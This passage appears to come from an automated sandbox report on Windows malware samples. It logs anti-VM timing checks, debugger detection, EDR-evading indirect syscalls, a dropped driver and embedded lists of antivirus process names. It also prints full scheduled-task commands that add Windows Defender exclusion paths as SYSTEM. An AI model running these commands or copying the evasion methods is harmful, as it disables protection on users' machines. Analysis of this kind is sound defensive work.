MOND.EXEKVMONXP.EXEBAIDUSAFETRAY.EXEBAIDUSD.EXEBKA.EXEBKA
Source: qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: AUTORUNS.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	RDTSC instruction interceptor: First address: 1400010D8 second address: 1400010EF instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c nop 0x0000000d nop 0x0000000e dec eax 0x0000000f xor edx, edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 fldpi 0x00000015 frndint 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	RDTSC instruction interceptor: First address: 1400010EF second address: 1400010EF instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 xor ebx, ebx 0x00000009 dec eax 0x0000000a mov ebx, edx 0x0000000c dec eax 0x0000000d or eax, ebx 0x0000000f dec eax 0x00000010 sub eax, ecx 0x00000012 nop 0x00000013 dec ebp 0x00000014 xor edx, edx 0x00000016 dec esp 0x00000017 mov edx, eax 0x00000019 dec ebp 0x0000001a cmp edx, eax 0x0000001c jc 00007F6BC1057350h 0x0000001e fldpi 0x00000020 frndint 0x00000022 rdtsc
Source: C:\Users\user\Documents\7tqorj.exe	RDTSC instruction interceptor: First address: 528305 second address: 528313 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov ecx, edx 0x00000005 dec ecx 0x00000006 shl ecx, 20h 0x00000009 dec esp 0x0000000a or ecx, eax 0x0000000c frndint 0x0000000e rdtsc

Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe

Dropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sys

Jump to dropped file

Source: C:\Program Files (x86)\2U36F\NroRNr.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep			graph_43-3244
Source: C:\Users\user\Documents\7tqorj.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess			graph_5-14081

Source: C:\Users\user\Documents\7tqorj.exe

API coverage: 2.7 %

Source: C:\Users\user\Documents\7tqorj.exe TID: 1408	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe TID: 5348	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe TID: 5348	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe TID: 6620	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe TID: 4000	Thread sleep time: -35000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe TID: 1096	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe TID: 5912	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe TID: 6404	Thread sleep count: 79 > 30	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe TID: 6404	Thread sleep time: -39500s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe TID: 5912	Thread sleep count: 46 > 30	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe TID: 1776	Thread sleep count: 72 > 30	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe TID: 1776	Thread sleep time: -36000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe TID: 1096	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\Documents\7tqorj.exe	Last function: Thread delayed
Source: C:\Users\user\Documents\7tqorj.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Documents\7tqorj.exe

Code function: 5_2_00007FFDA580A1B8 FindFirstFileExW,

5_2_00007FFDA580A1B8

Source: C:\Users\user\Documents\7tqorj.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: C:\Users\user\Documents\7tqorj.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: qNHTRl.exe, 00000029.00000002.3974221880.0000000000957000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Documents\7tqorj.exe	API call chain: ExitProcess graph end node			graph_5-14082
Source: C:\Users\user\Documents\7tqorj.exe	API call chain: ExitProcess graph end node			graph_5-14426

Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Documents\7tqorj.exe

Code function: 5_2_00000001400073E0 LdrLoadDll,

5_2_00000001400073E0

Source: C:\Users\user\Documents\7tqorj.exe

Code function: 5_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

5_2_0000000140007C91

Source: C:\Users\user\Documents\7tqorj.exe

Code function: 5_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

5_2_000000014000F000

Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Code function: 41_3_02700643 mov eax, dword ptr fs:[00000030h]	41_3_02700643
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Code function: 41_3_02700643 mov eax, dword ptr fs:[00000030h]	41_3_02700643
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Code function: 41_3_027000CD mov eax, dword ptr fs:[00000030h]	41_3_027000CD
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Code function: 41_3_027000CD mov eax, dword ptr fs:[00000030h]	41_3_027000CD
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Code function: 41_3_02700643 mov eax, dword ptr fs:[00000030h]	41_3_02700643
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Code function: 41_3_02700643 mov eax, dword ptr fs:[00000030h]	41_3_02700643
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Code function: 41_3_027000CD mov eax, dword ptr fs:[00000030h]	41_3_027000CD
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Code function: 41_3_027000CD mov eax, dword ptr fs:[00000030h]	41_3_027000CD

Source: C:\Users\user\Documents\7tqorj.exe

Code function: 5_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,

5_2_0000000140004630

Source: C:\Users\user\Documents\7tqorj.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Documents\7tqorj.exe	Code function: 5_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_0000000140007C91
Source: C:\Users\user\Documents\7tqorj.exe	Code function: 5_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00000001400106B0
Source: C:\Users\user\Documents\7tqorj.exe	Code function: 5_2_00000001400092E0 SetUnhandledExceptionFilter,	5_2_00000001400092E0
Source: C:\Users\user\Documents\7tqorj.exe	Code function: 5_2_00007FFDA5802630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00007FFDA5802630
Source: C:\Users\user\Documents\7tqorj.exe	Code function: 5_2_00007FFDA58076E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00007FFDA58076E0
Source: C:\Users\user\Documents\7tqorj.exe	Code function: 5_2_00007FFDA5801F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00007FFDA5801F50
Source: C:\Program Files (x86)\2U36F\NroRNr.exe	Code function: 43_2_00FA2AE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	43_2_00FA2AE2
Source: C:\Program Files (x86)\2U36F\NroRNr.exe	Code function: 43_2_00FA10CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	43_2_00FA10CC
Source: C:\Program Files (x86)\2U36F\NroRNr.exe	Code function: 43_2_00FA51FB __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	43_2_00FA51FB

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Documents\7tqorj.exe	NtAllocateVirtualMemory: Indirect: 0x140006FD0	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	NtProtectVirtualMemory: Indirect: 0x2ABB253	Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	NtDelayExecution: Indirect: 0x1F94D2	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	NtProtectVirtualMemory: Indirect: 0x2ACB253	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	NtProtectVirtualMemory: Indirect: 0x2A7B253	Jump to behavior

Source: C:\Users\user\Documents\7tqorj.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process created: C:\Program Files (x86)\qNHTRl\qNHTRl.exe "C:\Program Files (x86)\qNHTRl\qNHTRl.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f	Jump to behavior

Source: C:\Users\user\Documents\7tqorj.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\7tqorj.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\7tqorj.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\7tqorj.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\7tqorj.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior

Source: C:\Users\user\Documents\7tqorj.exe

Code function: 5_2_00007FFDA580FD40 cpuid

5_2_00007FFDA580FD40

Source: C:\Users\user\Documents\7tqorj.exe	Code function: GetLocaleInfoA,		5_2_000000014000F370
Source: C:\Program Files (x86)\2U36F\NroRNr.exe	Code function: GetLocaleInfoA,		43_2_00FA6B1A

Source: C:\Users\user\Documents\7tqorj.exe

Code function: 5_2_000000014000A370 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

5_2_000000014000A370

Source: C:\Users\user\Documents\7tqorj.exe

Code function: 5_2_0000000140005A70 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

5_2_0000000140005A70

Source: 7tqorj.exe, 00000005.00000002.2717314493.0000000002898000.00000002.00001000.00020000.00000000.sdmp, 7tqorj.exe, 00000006.00000002.2727392092.0000000002848000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: kxetray.exe
Source: 7tqorj.exe, 00000005.00000002.2717314493.0000000002898000.00000002.00001000.00020000.00000000.sdmp, 7tqorj.exe, 00000006.00000002.2727392092.0000000002848000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: vsserv.exe
Source: 7tqorj.exe, 00000005.00000002.2717314493.0000000002898000.00000002.00001000.00020000.00000000.sdmp, 7tqorj.exe, 00000006.00000002.2727392092.0000000002848000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avcenter.exe
Source: 7tqorj.exe, 00000005.00000002.2717314493.0000000002898000.00000002.00001000.00020000.00000000.sdmp, 7tqorj.exe, 00000006.00000002.2727392092.0000000002848000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: KSafeTray.exe
Source: 7tqorj.exe, 00000005.00000002.2717314493.0000000002898000.00000002.00001000.00020000.00000000.sdmp, 7tqorj.exe, 00000006.00000002.2727392092.0000000002848000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: qNHTRl.exe, qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360safe.exe
Source: qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: SuperKiller.exe
Source: qNHTRl.exe, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: msmpeng.exe
Source: qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: Autoruns.exe
Source: 7tqorj.exe, 00000005.00000002.2717314493.0000000002898000.00000002.00001000.00020000.00000000.sdmp, 7tqorj.exe, 00000006.00000002.2727392092.0000000002848000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360Safe.exe
Source: qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: mcshield.exe
Source: 7tqorj.exe, 00000005.00000002.2717314493.0000000002898000.00000002.00001000.00020000.00000000.sdmp, 7tqorj.exe, 00000006.00000002.2727392092.0000000002848000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: 360tray.exe
Source: 7tqorj.exe, 00000005.00000002.2717314493.0000000002898000.00000002.00001000.00020000.00000000.sdmp, 7tqorj.exe, 00000006.00000002.2727392092.0000000002848000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: rtvscan.exe
Source: 7tqorj.exe, 00000005.00000002.2717314493.0000000002898000.00000002.00001000.00020000.00000000.sdmp, 7tqorj.exe, 00000006.00000002.2727392092.0000000002848000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: ashDisp.exe
Source: 7tqorj.exe, 00000005.00000002.2717314493.0000000002898000.00000002.00001000.00020000.00000000.sdmp, 7tqorj.exe, 00000006.00000002.2727392092.0000000002848000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: qNHTRl.exe, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: 360Tray.exe
Source: 7tqorj.exe, 00000005.00000002.2717314493.0000000002898000.00000002.00001000.00020000.00000000.sdmp, 7tqorj.exe, 00000006.00000002.2727392092.0000000002848000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: avgwdsvc.exe
Source: 7tqorj.exe, 00000005.00000002.2717314493.0000000002898000.00000002.00001000.00020000.00000000.sdmp, 7tqorj.exe, 00000006.00000002.2727392092.0000000002848000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: AYAgent.aye
Source: 7tqorj.exe, 00000005.00000002.2717314493.0000000002898000.00000002.00001000.00020000.00000000.sdmp, 7tqorj.exe, 00000006.00000002.2727392092.0000000002848000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: QUHLPSVC.EXE
Source: 7tqorj.exe, 00000005.00000002.2717314493.0000000002898000.00000002.00001000.00020000.00000000.sdmp, 7tqorj.exe, 00000006.00000002.2727392092.0000000002848000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: RavMonD.exe
Source: 7tqorj.exe, 00000005.00000002.2717314493.0000000002898000.00000002.00001000.00020000.00000000.sdmp, 7tqorj.exe, 00000006.00000002.2727392092.0000000002848000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe
